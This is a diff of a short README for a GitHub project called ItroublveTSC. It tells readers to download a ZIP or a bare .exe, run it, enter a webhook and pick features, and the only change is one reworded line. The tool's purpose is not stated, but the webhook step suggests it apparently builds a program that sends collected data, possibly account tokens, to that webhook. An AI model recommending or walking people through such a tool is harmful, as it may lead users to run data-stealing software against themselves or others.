vex8277/ItroublveTSC/README.md

 It is really easy to set this up!

 Click the blue/green "CODE" button on this page.
 Choose the option "DOWNLOAD ZIP".
-Or you can directly download the ZIP from https://github.com/vex8277/ItroublveTSC/blob/main/ItroublveTSC.exe.

-Once downloaded, just run the .exe and input your webhook.
+Once downloaded, open the folder and just run the .exe and input your webhook.
 You can also choose the many features you want.

 ---------------------------------------------------------------------------------------------------
 <div align="center">